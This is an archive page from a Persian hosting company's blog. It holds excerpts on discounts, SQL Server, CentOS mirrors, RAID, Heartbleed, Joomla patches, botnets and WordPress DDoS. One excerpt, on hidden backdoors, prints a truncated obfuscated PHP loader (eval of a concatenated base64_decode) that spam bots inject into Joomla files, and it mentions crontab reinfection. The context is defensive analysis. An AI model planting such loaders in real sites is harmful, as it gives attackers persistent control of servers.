تیم تحریریه ایران‌سرور بلاگ ایرانسرور

جشنواره هدایای هفتگی ایران‌سرور

به‌منظور قدر دانی از همراهان ایران‌سرور و در جهت ترویج استفاده از خدمات هاستینگ، ایران‌سرور هدیه(هایی) را بصورت هفتگی برای هواداران خود در نظر گرفته‌است. این هدایای متنوع تا ۷ام مردادماه ۱۳۹۳، مصادف با عید سعید فطر، هر هفته و به تعداد محدود در صفحه هواداران ایران‌سرور ارائه خواهد شد. هر هدیه با ارزش کاملا متفاوت و در زمان تصادفی اعلام می‌گردد، ارزش متفاوت به این معنی است که هدیه می‌تواند شامل چند درصد تخفیف برای ثبت یک دامنه و یا ۱۰۰ درصد تخفیف در سفارش هاست باشد. برای استفاده از هدیه، کافیست وارد پنل‌کاربری خود در ایران‌سرور شوید و سرویس شامل هدیه را انتخاب، سپس مراحل ثبت سفارش را طی نمایید تا در بخش نهایی، پیش از پرداخت فاکتور، کد تخفیف هدیه را وارد و از هدیه خود لذت ببرید. راهنمای تصویری استفاده از کد تخفیف هر هدیه تنها توسط یک‌نفر قابل استفاده می‌باشد، در صورتی که هنگام وارد کردن کد با پیغام «کد تخفیف وارد شده معتبر نمی‌باشد» مواجه شدید به این معنی است که کاربر دیگری، پیش از شما از آن استفاده نموده‌است، اما جای نگرانی نیست؛ شما باز هم می‌توانید هدیه دریافت نمایید، فقط کافی است منتظر اعلام هدیه بعدی در صفحه هواداران ایران‌سرور باشید. راهنمای عضویت […]

مشکل Auto Identity Column در SQL Server 2012 و راه‌حل آن

چنانچه سرویس SQL را در MS SQL server 2012 ریست نمایید، VALUE (مقدار)هایی که Identity SPECIFICATION آن‌ها برابر YES باشد جهش پیدا می‌کنند. این افزایش مقدار، از نقطه نظر برنامه نویسی، به خصوص در زمانی که قصد نمایش داده‌ها به کاربر وجود دارد، قابل قبول نیست. برای درک بهتر، این مسئله را با مثالی در ادامه بررسی می‌کنیم: ابتدا به کمک Query (دستور)های زیر یک Table ایجاد و مقدار فیلد Id را بصورت Auto Identity Column تنظیم می‌کنیم، سپس دو سطر داده به آن اضافه کنید. create table MyTestTable(Id int Identity(1,1), Name varchar(255)); insert into MyTestTable(Name) values (‘Mr.Tom’); insert into MyTestTable(Name) values (‘Mr.Jackson’); به کمک Select می‌توان نتیجه دستورات بالا را بررسی کرد: SELECT Id, Name FROM MyTestTable; حال سرویس SQL را ریست کنید: به کمک دستورات زیر دو سطر جدید به Table اضافه کنید: insert into MyTestTable(Name) values (‘Mr.Tom2’); insert into MyTestTable(Name) values (‘Mr.Jackson2’); به وسیله Select نتیجه را بررسی کنید: SELECT Id, Name FROM MyTestTable; همان گونه که در تصویر بالا مشاهده می‌کنید، ستون Id پس از ریست شدن SQL به‌جای مقدار ۳ مقدار ۱۰۰۲ را می‌گیرد. رفع مشکل پرش Auto Identity Column پس از reset نمودن SQL: برای رفع این مشکل SQL SERVER CONFIGURATION MANAGER را باز کنید، از سمت چپ پنجره بر روی […]

رفع خطای password protect

password protect به شما امکان رمزگذاری بر روی پوشه‌ای خاص از فضای وب‌سایت‌تان را می‌دهد، به‌عنوان مثال می‌توانید به کمک آن امنیت پوشه wp-admin وردپرس را افزایش دهید. چنانچه پس از فعال کردن این امکان، در زمان ورود به URL محافظت شده به وسیله‌ی password protect، با خطای «Error 404 – Not Found» مواجه شدید و یا Prompt (پنجره درخواست اطلاعات ورود) مرورگر نمایش داده نشد، برای رفع آن اقدامات زیر را انجام دهید: وارد پوشه مورد نظر (به‌عنوان مثال wp-admin) شوید. فایل .htaccess را باز کنید. عبارت ErrorDocument 401 default را جایگزین AuthGroupFile /dev/null کنید. در انتها تغییرات اعمال شده را ذخیره کنید.

٪۱۵ تخفیف به مناسبت نیمه شعبان

طلوع می کند آن آفتاب پنهانی ز سمت مشرق جغرافیای عرفانی دوباره پلک دلم می پرد نشانه چیست شنیده ام که می آید کسی به مهمانی کسی که سبزترست از هزار بار بهار کسی شگفت کسی آن چنان که می دانی کسی که نقطه آغاز هر چه پروازست تویی که در سفر عشق، خطّ پایانی تویی بهانه آن ابرها که می گریند بیا که صاف شود این هوای بارانی تو از حوالی اقلیم هر کجا آباد بیا که می رود این شهر رو به ویرانی کنار نام تو لنگر گرفت کشتی عشق بیا که یاد تو آرامشی است طوفانی «قیصر امین پور» با تبریک پیشاپیش پانزده‌ام شعبان‌ماه، سالروز ولادت مولود خجسته‏‌اى که در این روز زمین را با قدوم خویش متبرک ساخته‌است، ایران‌سرور در نظر دارد برخی از سرویس‌های خود را با تخفیف ارائه نماید، این تخفیف‌ها عبارتند از: ۱۵ درصد تخفیف خرید سرویس هاست اشتراکی ویندوز. ۱۵ درصد تخفیف خرید سرویس هاست اشتراکی لینوکس. ۱۵ درصد تخفیف درصورت تمدید زودتر از موعد سرویس‌ هاست اشتراکی ویندوز. ۱۵ درصد تخفیف درصورت تمدید زودتر از موعد سرویس‌ هاست اشتراکی لینوکس. ۱۵ درصد تخفیف درصورت تمدید سه ماهه سرور مجازی. ۱۵ درصد تخفیف درصورت تمدید سه ماهه سرور اختصاصی ایران. اعتبار تخفیف‌ها از ۱۷ الی […]

آموزش تغییر Mirror در CentOS

مدتی پیش خبر رسمی شدن Mirror (میرور) ایران‌سرور را اعلام کردیم، امروز مفتخریم که علاوه بر میرور رسمی سیستم‌عامل ابونتو و کنترل‌پنل دایرکت‌ادمین میرور سیستم‌عامل CentOS (سنت‌او‌اس)‌ نیز هستیم. متاسفانه با وجود تلاش‌های بی‌وقفه برای رسمی شدن این میرور و به‌دلیل مشکلات ناشی از تحریم، شرکت سنت‌او‌اس از قبول ایران‌سرور به عنوان میرور رسمی خود سرباز زد. بنابراین استفاده از آن برخلاف دو میرور قبل خودکار نیست و کاربر جهت دسترسی باید به‌صورت دستی تنظیمات زیر را انجام دهد. آموزش تغییر میرور پیش‌فرض سیستم‌عامل سنت‌اواس: ابتدا با استفاده از دستور زیر فایل مربوط به لیست میرورهای سیستم‌عامل را باز کنید: nano /etc/yum.repos.d/CentOS-Base.repo در فایل باز شده، ابتدای تمامی گزینه‌های mirrorlist= یک سمبل شارپ (#) قرار دهید و سمبل # ابتدای #baseurl= را حذف کنید. پس از آن مقدار mirror.iranserver.com را جایگزین mirror.centos.org کنید. در انتها تغییرات اعمال شده در فایل CentOS-Base.repo را ذخیره نمایید. فیلم آموزش تغییر میرور پیش‌فرض سیستم‌عامل سنت‌او‌اس: مزایایی استفاده از میرور ایران‌سرور: ۱- بروز رسانی هر ۶ ساعت یک‌بار میرور. ۲_ اتصال با حد اکثر سرعت و دانلود سریع برای کاربران ایران. ۳_ عدم وجود مشکلات فیلترینگ میرورها. ۴_ اتصال و دانلود با سرعت ۱۰۰ مگابیت در دیتاسنتر پارس‌آنلاین، شاتل، آسیا تک و افرانت. ۵- استفاده از پهنای باند داخلی‌، در نتیجه صرفه‌جویی در […]

٪۵۰ تخفیف ویژه فروش هاست به مناسبت ۱۲امین سال تأسیس ایران‌سرور

ایران‌سرور بیش از یک دهه است که فعالیتش را در صنعت هاستینگ آغاز کرده و به پشتوانه کاربران عزیز توانسته است جایگاه خوبی را در بین شرکت‌های ارائه دهنده خدمات میزبانی وب بدست آورد. در آستانه فرارسیدن دوازده‌امین سال تأسیس شرکت ایران‌سرور قرار داریم و تلاشمان بر آن است که در سال جاری با فراهم کردن شرایط بهتر و سرویس‌های با کیفت‌تر و متنوع‌تر، رضایت هر چه بیشتر شما عزیزان را جلب نماییم. به بهانه تولد ایران‌سرور تصمیم داریم سرویس‌های هاست خود را به مدت یک هفته با تخفیف ۵۰% ارائه دهیم. همچنین اعضای باشگاه مشتریان ایران‌سرور، به پاس همراهی شان، می‌توانند علاوه بر استفاده از تخفیف فوق، با تمدید پیش از موعد یک ساله سرویس هاست از ۳۰ درصد تخفیف و تمدید ۶ ماهه سرور مجازی و اختصاصی از ۱۵ درصد تخفیف در هفته جاری بهره مند شوند. برای این استفاده از تخفیف‌های فوق، با بخش فروش تماس حاصل فرمایید. ساعت کاری بخش فـــروش ایران سرور: از ساعت ۸ الی ۱۵ شماره تماس : ۷۶۷۳۶۰۰-۰۵۱۱ (۴ خط)

آیا با وجود حل مشکل Heartbleed باید رمزها را تغییر داد؟

با توجه به حفره امنیتی SSL به نام Heartbleed که این روزهای جنجال‌های بسیار زیاد و نگرانی‌های قابل درک کاربران را به همراه داشته‌است، توصیه ما به شما تغییر رمزهای عبور خود در اولین فرصت ممکن می‌باشد. گوگل اعلام کرده است که کاربران نیازی به تغییر پسورد خود ندارند، اما برای امنیت بیشتر بهتر است این کار را انجام دهید. خصوصا با توجه به بررسی وب‌سایت Mashable مبنی بر وضعیت امنیتی برخی سایت‌های معروف و وضعیت آن‌ها در مورد این حفره، بهتر است رمزعبور سایت‌هایی را در لیست زیر ذکر شده است تغییر دهید. برای مشاهده لیست کامل می‌توانید به وب‌سایت Mashable مراجعه نمایید. شبکه‌های اجتماعی: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ مشکل امنیتی برطرف شده‌است؟ پسورد را تغییر دهیم؟ فیس‌بوک – Facebook بلی بلی بلی تویتر – Twitter بلی بلی نامشخص اینستاگرام – Instagram بلی بلی بلی لینکداین – LinkedIn خیر خیر خیر پینترست – Pinterest بلی بلی بلی تامبلر – Tumbler بلی بلی بلی شرکت‌های بزرگ: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ مشکل امنیتی برطرف شده‌است؟ پسورد را تغییر دهیم؟ گوگل – Google بلی بلی بلی مایکروسافت – Microsoft خیر خیر خیر یاهو – Yahoo بلی بلی بلی اپل – Apple خیر خیر خیر آمازون – Amazon خیر خیر خیر ایمیل: نام تحت تاثیر Heartbleed قرار گرفته‌است؟ […]

ایران‌سرور اولین Mirror رسمی Ubuntu و DirectAdmin در ایران

در هفته‌ای که گذشت ایران‌سرور اولین Mirror (میرور) رسمی Ubuntu (اوبونتو) و DA (دایرکت‌ادمین) را در ایران راه اندازی نمود. Mirror رسمی چیست؟ Mirror مخزنی است که برنامه‌ها و آپدیت‌های توزیع‌های لینوکس مانند اوبونتو و CentOS (سنت‌اواس)، را برای دسترسی و دانلود توسط کاربران نگه‌داری می‌کند، با توجه به اینکه روزانه میزان دانلود زیادی از Mirrorها انجام میشود، برای تسریع در سرعت دانلود و بالاتر بردن سرعت دانلود برای کاربران در نقاط مختلف جهان، Mirrorها بصورت توزیع شده عمل میکنند، بدین معنی که کاربران بصورت خودکار و بدون آنکه متوجه شوند، به نزدیکترین و سریعترین Mirror به خود متصل شده و فایل‌ها را از آن دانلود می‌کنند. مزایای Mirror رسمی ایران‌سرور: اکنون تمام کاربران ایرانی که از سیستم عامل Ubuntu نسخه‌های مختلف، استفاده میکنند بصورت خودکار نرم افزارهای جدید و بروزرسانی‌های سیستم عامل خود را از Mirror ایران‌سرور دریافت مینمایند، با توجه به اینکه سرور میرور ایران‌سرور در بستر شبکه ایران قرار دارد، دسترسی کاربران داخل ایران تا ۴برابر سریع‌تر از قبل خواهد بود. تمام کاربران ایرانی که از کنترل پنل Directadmin استفاده میکنند، در هنگام نصب کنترل پنل بصورت خودکار، اطلاعات را از سرور ایران‌سرور دریافت خواهند نمود و سرعت دانلود اطلاعات در هنگام نصب و بروزرسانی Directadmin بسیار سریعتر […]

حملات DDoS از طریق سایت‌های WordPress

حملات DDoS امروزه به‌دلیل اهمیت موضوع، بسیار مورد مطالعه و بررسی قرار می‌گیرد. در این مقاله قصد داریم تا درباره حمله‌ای گسترده که توانسته از هزاران سایت WordPress از همه جا بی‌خبر به‌عنوان منبع تکثیر استفاده کند، صحبت کنیم. بیش از ۱۶۲۰۰۰ سایت WordPress برای حملات توزیع شده اختلال در سرویس (DDoS) استفاده می‌شوند. چنانچه قابلیت pingback در سایت WordPress فعال باشد (به‌صورت پیش فرض غیرفعال است) می‌تواند برای حملات DDoS علیه سایت دیگر استفاده شود. توجه داشته باشید که XMLRP در pingback، Trackbacks، remote access از طریق موبایل و تعدادی ویژگی دیگر که شما احتمالا خیلی به آن‌ها علاقمندید، استفاده شده‌است بنابراین آن‌ها نیز می‌توانند مورد سوء استفاده قرار گیرند. بررسی روال انجام حملات DDoS به کمک سایت WordPress: حمله DDOS علیه یک سایت WordPress پربازدید توانست آن را برای ساعت‌های طولانی با کندی زیادی مواجه کند، زمانی که این حملات زیاد شد هاست سایت به کلی از سرویس دهی ناتوان و سایت از دسترس خارج شد. برای رفع مشکل صاحبان سایت مجبور شدند که سرور خود را در zone یک فایروال قرار دهند تا بتوانند حملات را مانیتور نمایند. پس از انتقال متوجه یک حمله سیل آسای توزیع شده مبتنی بر HTTP شدند. هزاران request (درخواست) در هر ثانیه به […]

هدایای نوروزی ایران‌سرور

پکیج‌های نوروزی ایران‌سرور به شرح زیر می‌باشد. جهت کسب اطلاعات بیشتر با واحد فروش ایران‌سرور تماس بگیرید. تلفن تماس: ۰۵۱۱۷۶۷۳۶۰۰ داخلی ۲۰۱ و ۲۰۲

سطوح مختلف RAID

تا کنون در ارتباط با اینکه RAID چیست؟ و انواع RAID صحبت کردیم، در این مقاله قصد داریم به بررسی سطوح مختلف RAID بپردازیم. RAID دارای چندین سطح می‌باشد که نوع آن معمولا به وسیله یک عدد مشخص می‌شود. وقتی که صحبت از سطوح RAID می‌شود منظور کیفیت ذخیره اطلاعات نیست، بلکه نحوه ذخیره‌سازی اطلاعات در آرایه‌ای از دیسک‌ها می‌باشد. تا کنون ۹ سطح متفاوت RAID پیاده‌سازی شده‌است که عبارتند از: RAID 0 RAID 1 RAID 2 RAID 3 RAID 4 RAID 5 RAID 6 RAID 10 یا RAID 1+0 RAID 01 یا RAID 0+1 RAID 0: در این سطح، اطلاعات به بلوک‌هایی با اندازه‌های مساوی تقسیم و هر بلوک به یک دیسک منتقل می‌گردد. به عنوان مثال اطلاعات به بلوک‌های A و B با اندازه‌های مساوی تقسیم و به دیسک‌ها منتقل می‌شوند. این روش اغلب توسط تکنیک striping استفاده می‌گردد و باعث افزایش سرعت خواندن و نوشتن اطلاعات می‌شود. پیش از استفاده توجه داشته باشید، RAID 0 روشی برای مقابله با از دست رفتن اطلاعات نیست. به‌عبارتی در این روش هیچگونه کپی از اطلاعات تهیه نمی‌شود و هنگامی که یکی از دیسک‌ها با مشکل برخورد کند، اطلاعات کاملا از دست خواهد رفت که البته می‌توان با پرداخت هزینه اطلاعات را تا حدودی بازیابی نمود. RAID 1: این نوع RAID […]

پیش به سوی PHP 5.4

اگر تازه می‌خواهید وارد دنیای وب شوید بهتر است از سرورهایی با نسخه پایدار ۵.۴ PHP بهره ببرید. اما کاربرانی نیز وجود دارند که در حال حاضر با ورژن‌های قدیمی PHP در حال کار هستند و می‌خواهند به سرورهایی با PHP ورژن ۵.۴ مهاجرت کنند، یا مدیران آن‌ها قصد ارتقاء ورژن PHP را دارند. راهکارهای ارتقاء PHP: با ارتقا ورژن PHP سرورهای وب مطمئنا امنیت و کارایی سرور بالاتر خواهد رفت اما مشکلات و مسائلی را برای برنامه نویسان و وب‌سایت‌ها به وجود خواهد آورد. اغلب این مشکلات به کابرانی مربوط می‌شود که از یک سیستم مدیریت محتوا (CMS) مانند وردپرس، جوملا یا دروپال به دور از دغدغه‌های برنامه نویسی استفاده می‌کنند. لود نشدن سایت، نمایش صفحه سفید، سایت همراه با اخطارها و خطوط خطای مختلف از جمله مشکلاتی هستند که برای این دسته از کاربران هنگام ارتقاء ورژن PHP به ۵.۴ پیش می‌آید. عوامل ایجاد این مشکلات را می‌توان به سه دسته تقسیم کرد: ۱. نسخه سیستم مدیریت محتوای شما با PHP 5.4 همخوانی -سازگاری- ندارد. ۲. قالب CMS شما که با زبان‌های PHP، HTML و CSS نوشته شده‌است با PHP 5.4 سازگاری ندارد. ۳. پلاگین و اکستنشن‌های مورد استفاده در وب‌سایت کنونی با PHP نسخه ۵.۴ همخوانی ندارد […]

بروزرسانی‌های امنیتی Joomla

تیم امنیتی جوملا به تازگی ۲ نسخه بروز رسانی امنیتی برای نسخه‌های ۲.۵.۱۹ و ۳.۲.۳ ارائه کرده‌است. چنانچه برای پیاده‌سازی وب‌سایت خود از هسته جوملا استفاده کرده‌اید، برای اطمینان داشتن از امنیت سایت خود، حتما در اسرع وقت نسبت به روزرسانی و اعمال این patchها اقدام نمایید. یک تیم ۳۰ نفره متشکل از داوطلبان متخصص جوملا توانسته‌اند ۴۰ bug (رخنه) را در مدیریت محتوای جوملا ۳.۲.۳ رفع کنند که شامل ۴ رخنه امنیتی نیز بوده‌است. ۱. با اولویت بالا: آسیب SQL Injection در هسته اصلی جوملای نسخه ۳.۱.۰ تا ۳.۲.۲. ۲. با اولویت متوسط: آسیب پذیری XSS در هسته جوملای نسخه ۳.۱.۲ تا ۳.۲.۲. ۳. با اولویت متوسط: آسیب پذیری XSS در هسته جوملای نسخه ۲.۵.۱۸ به قبل و نسخه ۳.۲.۲ به قبل. ۴. با اولویت متوسط: آسیب پذیری دسترسی غیرمجاز از طریق احراز هویت Gmail در هسته جوملای نسخه ۲.۵.۱۸ به قبل و نسخه های ۳.۲.۲ به قبل. همانطور که مشاهده میکنید، آسیب‌های SQL Injection و دسترسی غیرمجاز از طریق احراز هویت Gmail (که به صورت پیش فرض غیر فعال می‌باشند) از اولویت بالایی برخوردار هستند. به‌نظر می‌رسد آسیب SQL injection به دلیل عدم محافظت درست از id مجموعه وب لینک‌ها و سوء استفاده […]

انواع RAID

پیش از این در ارتباط با اینکه RAID چیست؟ صحبت کردیم، در این مقاله سعی داریم انواع RAID را از دیگاه پیاده‌سازی بررسی کنیم. به‌طور کلی دو پیکربندی برای RAID وجود دارد، که عبارتند از RAID نرم‌افزاری و ‌RAID سخت‌افزاری. ‌RAID سخت‌افزاری یا Hardware RAID: RAID سخت‌افزاری بیشتر برای سرورهای سازمانی، تجاری و همچنین هنگامی که میزان تحمل خطا و بهینه شدن کارایی سیستم بسیار مورد اهمیت کاربراست، مورد استفاده قرار می‌گیرد. کارایی سیستم در هنگام خواندن و نوشتن اطلاعات با استفاده از کنترلرهای مختلف می‌تواند متفاوت باشد. در این‌RAID سخت‌افزاری از یک کنترلر هوشمند (RAID Controller) و آرایه ای از دیسک‌ها برای از بین نرفتن اطلاعات و بهبود کارایی خواندن/نوشتن اطلاعات استفاده می‌شود. RAID Controller، وظیفه مدیریت و کنترل دیسک‌های متصل شده به هم را بر عهده دارد. این کنترلر هوشمند در دو مدل داخلی و خارجی طراحی شده‌است. مدل داخلی آن در داخل سرور و به برد اصلی سرور متصل می‌شود و مدل دیگر آن که به صورت خارجی است، در RAIDهای سطح و مقیاس بالا به کار می‌رود. بسته به پیکربندی‌های صورت گرفته،RAID سخت‌افزاری کارایی‌های متفاوتی را فراهم می‌کند. علاوه بر اینکه مدیریت دیسک‌های گوناگون را آسان، این قابلیت را فراهم می‌کند تا کاربر آرایه‌ای از دیسک‌ها را فقط به صورت یک دیسک تنها مشاهده و […]

Backdoorهای پنهان

امروزه دیگر کدهای مخرب پاسخگوی اهداف تولید کننده‌گانشان نیستند، چون به سادگی شناسایی و حذف می‌گردند. کلید موفقیت مهاجمان برای ایجاد بدافزار سودآور؛ در پشتکار و تکرار عملیات تا زمان موفقیت نهفته است. به همین دلیل ما شاهد افزایش نرم‌افزارهای خلاقانه بر مبنای تکنیک‌های Backdoor هستیم. بدافزارهایی که در آن‌ها از روش‌های منحصر به فرد و متدهای مبهم برای افزایش طول عمر حملات استفاده می‌گردد. در ادامه برای معرفی بهتر Backdoor سناریویی که امروز با آن مواجه شدم را شرح خواهم داد: یک نمونه ربات تزریق SPAM می‌تواند تکه کد ساده ولی حرفه‌ای زیر را به یکی از فایل‌های معتبر جوملا اضافه نماید. $stg=”ba”.”se”.”64_d”.”ecode”;eval ($stg(“JHNlcnZlcl91c2VyX2FnZW50ICAgID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KJHNlcnZlcl9yZWZlcmVyICAgICAgID0gQCRfU0VSVkVSWydIVFRQXJFRkVSRVInXTsNCiRzZXJ2ZXJfZm9yd2FyZGVkX2ZvciA9IEAkX1N…. قطعه کد بالا ترفند جدیدی نیست، از این دسته حملات در نسخه‌های قدیمی سایت‌ساز جوملا بسیار دیده شده‌است‌ و هزاران مطلب در رابطه با آن بر بستر اینترنت وجود دارد. اما این ربات‌ها در اکثر مواقع تنها نیستند و یک همدست برای رسیدن به قصد نهایی خود دارند؛ همدستی مانند یک پوسته‌ی قدیمی PHP که دسترسی دائمی سرور را به مهاجم خواهد داد. این مطلب نیز جدید نیست. Crontab Backdoor: پیدا کردن و حذف قطعه کد مخرب فوق بسیار آسان بود، اما سایت در کمتر از ۱۰ دقیقه مجددا آلوده شد!!! با توجه به اینکه، سایت مثال ما از نسخه‌ی قدیمی جوملا استفاده می‌کند، […]

Proliant Gen8،نسل هشتم سرورهای HP

Proliant Gen8 نتیجه ۳۰۰ میلیون دلار هزینه و ۲ سال برنامه ریزی کمپانی HP می‌باشد که با نام Project Voyager مطرح شده‌است. این پروژه از مجموع بیش از ۹۰۰ اختراع به ثبت رسیده انتخاب، و از معماری سیستم جدیدی که به HP ProActive Insight architecture معروف است، حاصل شده است. هدف اصلی طراحی نسل هشتم سرورهای ProLiant، مدیریت آسان، افزایش قابل ملاحظه‌ی سرعت IO و میزان پهنای باند می‌باشد. سرورهای سری Gen8 بسیار هوشمند هستند و تقریبا می‌توانند خودشان را مدیریت کنند. سرورهای Proliant در ۴ دسته زیر ارائه شده‌اند: server blades (BL series) rack-optimized servers (DL series) tower servers (ML series) hyperscale servers (SL series) در تصویر زیر مدل‌هایی که در نسل هشتم، جایگزین نسل قبلی شده‌اند نمایش داده شده‌است. HP در ساخت سرورهای سری Gen8، بر مقوله کارایی بالا و چابکی تمرکز نموده؛ در ادامه برخی از خصوصیات این سری ذکر شده‌است: عملکرد: ۴ برابر کارایی بیشتر در ماشین‌های مجازی، و ۳۸% سریعتر نسبت به مدل های قبل. سرعت وچابکی: ۹ برابر سریعتر در پیکربندی، و ۳ برابر سریعتر در توسعه. بهینه سازی انرژی به صورت خودکار: این قابلیت به صورت هوشمندانه، استفاده از فضا، قدرت و خنک کنندگی قطعات سرور را به حداکثر می‌رساند. افزایش حجم کار […]

موارد امنیتی که در زمان استفاده از SQL Server Managment می‌توان به‌کار برد.

امنیت در زمان استفاده از بانک‌های اطلاعاتی، خصوصا بر بستر اینترنت یکی از موارد مهم این‌روزها است. در این مقاله قصد داریم خلاصه‌ای از بهترین موارد امنیتی که در هنگام استفاده از SQL Server Management می‌توان درنظر گرفت را بیان کنیم: تنهاComponent (کامپوننت‌)ها و Network Libraryهایی که نیاز دارید را نصب کنید. بعد از نصب با استفاده از ابزار SQL Server Configuration Manager، ویژگی‌ها و سرویس‌های غیر ضروری را غیر فعال کنید. حالت Windows Authentication امن‌تر از حالت SQL Authentication و توصیه شده‌است تا حد امکان از حالت Windows Authentication mode استفاده کنید؛ اگر احتیاج به استفاده از حالت SQL Authentication دارید حتما از رمز عبورهای پیچیده‌ استفاده کنید. موارد زیر را در انتخاب رمز عبور و نام‌کاربری در نظر بگیرید: بهتر است رمز انتخابی ترکیبی از حروف کوچک، بزرگ، سمبل‌ها -کارکترهای غیر الفبایی مانند &, ^,%,*,$- و اعداد باشد. از نام‌های کاربری شناخته شده، رایج و آسان مانند admin ،password ،sa ،administrator ،sysadmin و امثال آن استفاده نکنید. از رمز عبورهای طولانی استفاده کنید (حداقل ۸ کاراکتر). چنانچه نیاز به استفاده از حالت SQL Authentication دارید، حتما از گواهینامه SSL معتبر استفاده کنید. SQL Server 2005 اجازه نمی‌دهد که اکانت sa بدون پسورد باشد، بنابراین رمز عبور اکانت sa […]

ISAPI چیست؟ کاربرد، مزایا و نحوه فعال‌سازی آن

ISAP چیست؟ در پاسخ به این سوال می‌توان گفت ISAPI مثل یک پل ارتباطی بین وب‌سرور و برنامه‌های کاربردی عمل می‌کند. این فناوری یک رابط برنامه‌نویسی کاربردی (API) است که به شما اجازه می‌دهد تا برنامه‌های سفارشی خود را با سرور وب IIS مایکروسافت یکپارچه کنید. در این مقاله از بلاگ ایران سرور، به‌طور کامل بررسی می‌کنیم ISAPI مخفف چیست، چه کاربرد و مزایایی دارد و تفاوت آن با CGI چیست. ISAPI چیست؟ ISAPI مخفف Internet Server Application Programming Interface نوعی API است که اجازه توسعه و گسترش قابلیت‌های موجود در وب‌سرور MS-IIS را برای برنامه‌نویسان فراهم می‌کند، طوری‌که ISAPI extensionها هیچ محدودیتی در دسترسی و استفاده از IIS ندارند. از آنجا که ISAPI عمدتاً برای توسعه افزونه‌ها و فیلترها در محیط وب سرور مایکروسافت طراحی شده، درک این‌که دقیقاً IIS چیست و چگونه کار می‌کند، برای درک بهتر ISAPI ضروری است. اگر وب‌سرور قدرتمند و انعطاف‌پذیر IIS را مانند یک خانه درنظر بگیریم، ISAPI مثل مجموعه‌ای از ابزارها و قطعاتی است که به شما اجازه می‌دهد این خانه را شخصی‌سازی و بهبود دهید. با استفاده از ISAPI، می‌توانید برنامه‌های کاربردی سفارشی ایجاد کنید که به‌طور مستقیم با IIS تعامل داشته باشند و عملکردهای جدیدی را به آن اضافه کنند. […]

تفاوت‌های نسخه‌های ۲۰۰۸ و ۲۰۱۲ پایگاه‌داده ‌MSSQL Server

Microsoft (مایکروسافت) نسخه جدید پایگاه‌داده MSSQL خود را تحت عنوان ‌MS SQL Server ۲۰۱۲، همراه با قابلیت‌های ویژه‌ای نسبت به نسخه قبل آن ارائه کرده‌است. برخی از این ویژگی‌ها بشرح زیر می‌باشد: ۱- پشتیبانی از Windows Server Core: این نسخه قابل نصب بر روی Windows Server Core می‌باشد. بدین معنا که شما می‌توانید این نسخه را بدون رابط گرافیکی نصب، و به کمک command prompt و powershell با آن ارتباط برقرار نمایید. ۲- اضافه شدن ویژگی AlwaysOn: AlwaysOn به شما امکان تهیه ۴ نسخه Read-only (فقط خواندنی) از بانک اطلاعاتی اصلی را می‌دهد، با استفاده از این ویژگی امکان ترکیب چندین پایگاه‌داده بصورت همزمان و غیر همزمان فراهم می‌شود. AO تکمیل کننده ویژگی Database Mirroring در نسخه‌های قبل می‌باشد. ۳- Columnstore Indexes: در ان نسخه نوع خاصی از Index (شاخص) فقط خواندنی با استفاده از Data Warehouse طراحی شده‌است. که باعث کاهش استفاده از RAM و I/O در Query (جستجو)های بزرگ شده و سرعت اجرای Query را بمراتب افزایش داده است. ۴- User-Defined Server Roles: امکان تعریف Role در نسخه‌های قبل وجود داشت، اما نه به گستردگی نسخه ۲۰۱۲. به عنوان مثال، چنانچه درنظر داشتید دسترسی read /write تمامی پایگاه‌‌های‌داده را به اعضای شرکت خود بدهید، باید برای هر پایگاه‌داده یک Role مجزا تعریف می‌نمودید، در نسخه جدید امکان تعریف یک […]

تحلیل Botnet نظیر به نظیر waledac

Botnets (بات‌نت‌ها) شبکه‌هایی از کامپیوترهای آلوده به بدافزار هستند که قادر به دریافت و اجرای فرامین صادر شده توسط Botmasters (مهاجمین راه‌دور) می‌باشند. بات‌نت، نه تنها حمله را از دید کاربران مخفی نگه می‌دارند، بلکه به عنوان یک زیربنا برای بسیاری از انواع جرایم اینترنتی محسوب می‌شوند. از این نوع جرایم می‌توان به ارسال انبوه هرزنامه، حمله‌های DDoS (جلوگیری از سرویس توزیعی)، سرقت هویت و غیره اشاره کرد. در سال‌های اخیر بر روی روش‌های تشخیص و جلوگیری از بات‌نت‌ها تحقیقات زیادی انجام شده است، اما بات‌نت‌ها نیز به همان اندازه در حال رشد و گسترش هستند. مهاجمین برای محکم سازی زیربنای ارسال فرامین خود از انواع روش‌های مختلف از قبیلِ رمزنگاری، پروتکل‌های ارتباطی جدید و … استفاده می‌کنند. معماری اولیه‌ی Command and Control (کانال‌های فرمان و کنترل) بات‌نت‌ها به صورت متمرکز بود، ولی به دلیل وجود Single point of failure (در این حالت کل بات‌نت از بین می‌رود)، امروزه از پروتکل ارتباطی نظیر به نظیر غیر متمرکز استفاده می‌کنند. در بات‌نت‌های غیرمتمرکز با شناسایی تعدادی از میزبان‌های آلوده به بات نمی‌توان کل شبکه بات‌نت را از کار انداخت. بات‌نت‌های غیر متمرکز به دو دسته ی نظیر به نظیر و Hybrid (ترکیبی) تقسیم می‌شوند. در یک بات‌نت نظیر به نظیر، بات‌ها […]

نویسنده: تیم تحریریه ایران‌سرور